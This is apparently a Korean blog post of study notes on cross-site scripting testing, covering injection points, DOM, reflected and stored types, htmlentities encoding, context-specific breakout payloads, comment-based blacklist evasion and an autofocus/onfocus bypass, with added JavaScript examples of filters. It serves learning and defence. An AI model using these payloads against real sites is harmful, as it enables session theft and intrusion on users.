์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

XSS ๊ณต๊ฒฉ ํ”„๋กœ์„ธ์Šค

๊ณต๊ฒฉ ๋Œ€์ƒ ํƒ์ƒ‰

<, >, ", document.cookie, <script>

ex) <b> hello world </b>

๊ธ€ ์ž‘์„ฑ ์‹œ ์Šคํฌ๋ฆฝํŠธ ๋™์ž‘์ด ๋˜์ง€ ์•Š๋”๋ผ๋„, ๋‹ค๋ฅธ ํŽ˜์ด์ง€๋ฅผ ํ†ตํ•ด์„œ ํ™•์ธ์„ ํ•ด์•ผํ•œ๋‹ค

 

๊ณต๊ฒฉ ๊ธฐ๋ฒ• ํŒŒ์•…

DOM based : ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์ด ๋ฆฌ์Šคํฐ์ด ๋˜๋Š” ์ฝ”๋“œ์— ๋‚˜์˜ค์ง€ ์•Š๋Š”๋‹ค

Reflected Based : ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์ด ๋ฆฌ์Šคํฐ์ด ๋˜๋Š” ์ฝ”๋“œ์— ํ•จ๊ป˜ ํฌํ•จ๋œ๋‹ค

Stored based : ์ถœ๋ ฅ ํฌ์ง€์…˜ ๋ฐ ์ธ์ฝ”๋”ฉ ์œ„์น˜ ํŒŒ์•…, ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์— ์ €์žฅ๋ผ์žˆ๋Š”๊ฑธ ๋ถˆ๋Ÿฌ์˜จ๋‹ค

 

๊ณต๊ฒฉ ์‹œ๋„

XSS ๊ณต๊ฒฉ ๊ธฐ๋ฐ˜์œผ๋กœ ์‹œ๋‚˜๋ฆฌ์˜ค ์ž‘์„ฑ

<script>alert(document.cookie)</script>

Syntax used for DOM based attacks

Functions used between <script></script>

document.write()

document.writeln()

document.URL

Element.innerHTML       

<img src=# onerror=>

 

Stored์—์„œ ์ถœ๋ ฅ ํฌ์ง€์…˜ ํŒŒ์•…

 

์ „์œ„ ์ฒ˜๋ฆฌ๋ฐฉ์‹ vs ํ›„์œ„ ์ฒ˜๋ฆฌ๋ฐฉ์‹

title ( ์ „์œ„ ์ฒ˜๋ฆฌ ๋ฐฉ์‹ ) , content ( ํ›„์œ„ ์ฒ˜๋ฆฌ ๋ฐฉ์‹)

(์‚ฌ์šฉ์ž) → ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ → html → insert → DATABASE

์ „์œ„ ์ฒ˜๋ฆฌ : INSERT๊ฐ€ ๋˜๊ธฐ ์ „์— HTMLentities ์ธ์ฝ”๋”ฉ์„ ํ†ตํ•ด์„œ ์Šคํฌ๋ฆฝํŠธ ๋ฐฉ์ง€

ํƒ€์ดํ‹€ ๊ฐ™์ด ๋‹ค์–‘ํ•œ root์—์„œ ๋ณผ ์ˆ˜ ์žˆ์„ ๋•Œ ์ „์ฒ˜๋ฆฌ๊ฐ€ ๋งž๋‹ค

( ex - home์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋Š” ํƒ€์ดํ‹€, board์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋Š” ํƒ€์ดํ‹€)

# action.php
$content = htmlentities($db_conn->real_escape_string($_POST["content"]));

vs

(user) → user input → html → insert → DATABASE → SELECT → HTML entities

Post-processing: prevent scripts by applying HTML entities encoding at SELECT time, when the value is displayed

When a value such as content has several routes but ends up shown on one page, post-processing is appropriate

# view.php
<td><?=htmlentities($row["content"])?></td>

 

๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€ ํŒŒ์•…

๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋Š” ์‹ ์†ํ•˜๊ฒŒ ํŒŒ์•…ํ•ด์•ผํ•œ๋‹ค

๊ณต๊ฒฉ ์„ฑ๊ณต ์œ ๋ฌด๋ฅผ ๊ฒฐ์ •ํ•œ๋‹ค

<script>alert(document.cookie)</script> # -> o ๋ 

<script>alert(document.cookie)</script>

์•ˆ๋  ๋•Œ

์ˆ˜์ • ํŽ˜์ด์ง€ ์ด์šฉ , Stored based ๊ธฐ์ค€์œผ๋กœ ์ถœ๋ ฅ ํฌ์ง€์…˜์— ๋”ฐ๋ผ์„œ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋„ ํŒ๋‹จ

 

ํ˜•ํƒœ ๋ถ„์„

1.<body> ํƒœ๊ทธ ์•ˆ์— ๋“ค์–ด๊ฐˆ ๊ฒฝ์šฐ

<body> [์ด๊ณณ์— ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ž…๋ ฅ] </body>

> ๊บฝ์‡ ๋ฌธ์ž(<,>) ์‚ฌ์šฉ์ด ๋ฐ˜๋“œ์‹œ ํ•„์š”ํ•˜๋‹ค

<b> ํƒœ๊ทธ๋ฅผ ๋„ฃ์–ด์„œ ๋ณผ๋“œ์ฒด๊ฐ€ ๋‚˜์˜ค๋ฉด ๊บฝ์‡  ์‚ฌ์šฉ ๊ฐ€๋Šฅ

 

2. When the input lands inside a <script> tag

<script> [script is entered here] </script>

<script> var keyword = "[script is entered here]"; </script>

Script = " alert(document.cookie); //

<script> var keyword = " " alert(document.cookie); // "; </script>
<script> var keyword = "</script><script>alert(document.cookie)//"; </script>

A double quote (") is required

 

3. When the input lands inside an <input> tag

<input type="text" name="keyword" value="[script is entered here]">

Script = ><script> alert(document.cookie) </script>

<input type="text" name="keyword" value="><script>alert(document.cookie)</script>">

Angle brackets (<, >) and a double quote (") are required

 

1๋ฒˆ์˜ ๊ฒฝ์šฐ <b> ํƒœ๊ทธ๋ฅผ ๋„ฃ์–ด์„œ ๋ณผ๋“œ์ฒด๊ฐ€ ๋‚˜์˜ค๋ฉด ๊บฝ์‡  ์‚ฌ์šฉ ๊ฐ€๋Šฅ

<b>test</b> --> ๊ณต๊ฒฉ์ด ๋  ์ˆ˜ ์—†๋‹ค

 

2๋ฒˆ์˜ ๊ฒฝ์šฐ test " test ๋ฅผ ๋„ฃ์–ด์„œ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋ฅผ ํŒŒ์•…ํ•œ๋‹ค

์Šคํฌ๋ฆฝํŠธ ์•ˆ์—์„œ " ๋ฌธ์ž๊ฐ€ ์•„๋‹ˆ๋ผ &qout ๋กœ ๋‚˜์˜ค๋ฉด ๊ณต๊ฒฉ์ด ๋  ์ˆ˜ ์—†๋‹ค

 

DOM Based์—์„œ ๊บฝ์ƒˆ(<, >)๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ๋ชปํ•  ๊ฒฝ์šฐ

location.href ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•  ๋•Œ๋งŒ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ # --> GET์œผ๋กœ ์ „์†ก ํ•  ๋•Œ

์ฃผ์†Œindex.php#?var1=test1&var2=test2

http://192.168.0.200/xss/example3.php?keyword=<img src=x onerror=alert('test')>

http://192.168.0.200/xss/example3.php#keyword=<img src=x onerror=alert('test')>
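As an added example (not code from the original post), this Node.js script shows what the server and the client-side script each see for the two URL forms above, and why the fragment form can only be handled by encoding in the page's own JavaScript; the sink functions are constructed stand-ins for document.write / innerHTML.

```javascript
// Added example (not code from the original post): why the fragment (#) form
// of the URL above is a DOM based case. Node.js, WHATWG URL class only.

// What the server receives: path and query string. A browser never sends the
// part after '#', so server-side htmlentities() in the PHP never sees it.
function serverSideView(urlString) {
  const u = new URL(urlString);
  return { path: u.pathname, keyword: u.searchParams.get("keyword") };
}

// What client-side script sees through location.href / location.hash. The
// post's own form is index.php#?var1=test1&var2=test2, so the fragment is
// parsed like a query string (the optional leading '?' is dropped).
function clientSideView(urlString) {
  const u = new URL(urlString);
  return Object.fromEntries(new URLSearchParams(u.hash.replace(/^#\??/, "")));
}

// Two simulated sinks. vulnerableSink is the document.write / innerHTML
// pattern listed above; safeSink entity-encodes first, which is what
// assigning to textContent achieves in a real page.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function vulnerableSink(keyword) {
  return `<div id="result">${keyword}</div>`;
}
function safeSink(keyword) {
  return `<div id="result">${encodeHtml(keyword)}</div>`;
}

// Detection: does the rendered markup contain a tag with an on* handler?
function hasEventHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed URLs mirroring the two forms on the page; the onerror string is
// used only as a probe to show which side can see it.
const PROBE = "<img src=x onerror=alert('test')>";
const QUERY_URL = "http://192.168.0.200/xss/example3.php?keyword=" + encodeURIComponent(PROBE);
const FRAGMENT_URL = "http://192.168.0.200/xss/example3.php#keyword=" + encodeURIComponent(PROBE);
```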

 

๊ฒ€์ฆ ๋กœ์ง ๋ถ„์„

htmlentities() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•œ ๊ฒ€์ฆ ๋กœ์ง

<script></script> ์ด ๊ตฌ๋ฌธ์„ ๋„ฃ์„ ๋•Œ ์„ฑ๊ณต / ์‹คํŒจ

 

์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’

1. ๊ฒ€์ฆ ๋กœ์ง์ด ์กด์žฌ

1-1 HTML tag ์‚ฌ์šฉ์ด ๊ฐ€๋Šฅํ•œ

- ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค

- ๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค

1-2 HTML tag ์‚ฌ์šฉ์ด ๋ถˆ๊ฐ€๋Šฅ

- HTML entity encoding

 

2. ๊ฒ€์ฆ ๋กœ์ง์ด ์กด์žฌํ•˜์ง€ ์•Š์Œ

> ๋

 

ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ์™€ ๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ ํŒ๋ณ„

๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ : ํŠน์ • ํŒจํ„ด๋งŒ ์ œ์™ธํ•˜๊ณ  ๋‚˜๋จธ์ง€ ALL ํ—ˆ์šฉ

ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ : ํŠน์ • ํŒจํ„ด๋งŒ ํ—ˆ์šฉํ•˜๊ณ  ๋‚˜๋จธ์ง€ ALL ๊ฑฐ๋ถ€

<b>,<h1> ... ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๊ฐ„๋‹จํ•œ ํƒœ๊ทธ๋“ค์€ ์ „๋ถ€ ์ธ์šฉํ•ด๋ณธ๋‹ค

<test> ์ด๋ ‡๊ฒŒ ์‚ฌ์šฉํ•ด ๋ณธ๋‹ค = &lt;test&gt; : htmlentity encoding 

<test> ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ–ˆ์„ ๋•Œ ์„ฑ๊ณตํ•œ๋‹ค : ๊ณต๊ฒฉ ๊ฐ€๋Šฅ์„ฑ์ด ์ถฉ๋ถ„ํžˆ ์กด์žฌ

te''st ์‚ฌ์šฉํ•ด ๋ณธ๋‹ค : te&quot;st : htmlentity encoding

te''st๊ฐ€ ์ •์ƒ์ ์œผ๋กœ ์ถœ๋ ฅ์ด ๋˜๋ฉด ์Šคํฌ๋ฆฝํŠธ ํƒœ๊ทธ ๋‚ด์—์„œ ์šฐํšŒ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๋‹ค

 

๋ฆฌ์Šคํฐ๊ฐ’์—์„œ[<, >, "]๊ธฐํ˜ธ๋“ค์ด [&gt; / &lt; / &quot] ๊ฐ’์œผ๋กœ ํ‘œํ˜„์ด ๋˜๋ฉด

htmlentitiy encoding ์ด ๋˜์–ด์žˆ๋‹ค > ๊ณต๊ฒฉ ์‹คํŒจ

 

์ฃผ์„/๊ฐœํ–‰/๊ณต๋ฐฑ ๋“ฑ์„ ํ™œ์šฉํ•œ ์šฐํšŒ

ex) alert(document.cookie)์ด ๋ฌธ์ž์—ด์„ ํ•„ํ„ฐ๋ง

alert/**/(document.cookie)

alert(document/**/.cookie)

alert(document/**/./**/cookie)

alert(docu/**/ment.cookie) > does not work
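As an added example (not code from the original post), this Node.js script runs the four variants above against a naive blacklist, a normalised blacklist, and the whitelist-plus-entity-encoding approach from the previous section; all three filters are constructed for this example.

```javascript
// Added example (not code from the original post): how the comment-insertion
// variants above slip past a naive blacklist, and the two stricter checks a
// reviewer would compare them against. Node.js, no dependencies; the filter
// rules are constructed for this example.

// Naive blacklist from the page: reject the exact string.
function naiveBlacklistAllows(input) {
  return !input.includes("alert(document.cookie)");
}

// Same blacklist after normalising: strip /* */ comments and whitespace, so
// an inserted comment no longer splits the forbidden token.
function normalise(input) {
  return input.replace(/\/\*[\s\S]*?\*\//g, "").replace(/\s+/g, "");
}
function normalisedBlacklistAllows(input) {
  return !normalise(input).includes("alert(document.cookie)");
}

// Whitelist: entity-encode everything, then restore only bare tags from a
// small allowed set (the simple tags the page mentions). Unknown tags such as
// <test> or <script>, and any tag carrying attributes, stay encoded.
const ALLOWED_TAGS = new Set(["b", "i", "h1"]);
function whitelistEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input
    .replace(/[&<>"']/g, (c) => map[c])
    .replace(/&lt;(\/?)([a-z0-9]+)&gt;/gi, (m, slash, tag) =>
      ALLOWED_TAGS.has(tag.toLowerCase()) ? `<${slash}${tag}>` : m);
}

// Constructed probes: the four comment variants listed above. The last one
// does not run in a browser, but it is still caught after normalising.
const VARIANTS = [
  "alert/**/(document.cookie)",
  "alert(document/**/.cookie)",
  "alert(document/**/./**/cookie)",
  "alert(docu/**/ment.cookie)",
];
```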

 

์ •์ƒ์ ์œผ๋กœ ์ž˜ ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธ

1
<b>test</b>

์‚ฌ์šฉ ๊ฐ€๋Šฅ

2
<script>alert(document.cookie)</script>

 

์‚ฌ์šฉ ๋ถˆ๊ฐ€๋Šฅ

alert์ด ๋ง‰ํ˜€์žˆ๋Š”์ง€ script๊ฐ€ ๋ง‰ํ˜€์žˆ๋Š”์ง€ ๋ชจ๋ฅด๊ธฐ ๋•Œ๋ฌธ์— 

<b>alert(document.cookie)</b> ๋ฅผ ํ™•์ธํ–ˆ์„๋•Œ ์‚ฌ์šฉ ๊ฐ€๋Šฅ

alert ๋Œ€์ฒด ๊ฐ€๋Šฅ ๋ฌธ๊ตฌ

confirm , prompt

 

 

3
<input type="text" name="keyword" value="value">

<input type="text" name="keyword" value=" " <script> alert (document.cookie)</script">

 

To carry out an XSS attack in an input tag, ", <, > must be usable

 

<input type="text" name="keyword" value="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">

- HTML entity encoding is applied

 

Using the onfocus event handler, the HTML entities encoding above can be evaded (no angle brackets are needed; the payload still depends on the double quote).

onFocus: the event fired when the cursor is placed in the field

<input type="text" name="keyword" value="autofocus onfocus="alert(document.cookie)" >

Check the resulting pop-up window

" autofocus onfocus="alert(document.cookie)

 

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SESSION High jacking  (0) 2022.07.14
XSS ์šฐํšŒ ๊ณต๊ฒฉ  (0) 2022.07.14
XSS - Cross Site Script  (0) 2022.07.12
Secure coding  (0) 2022.07.12
SQL Injection ์‹ค์Šต  (0) 2022.07.08
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.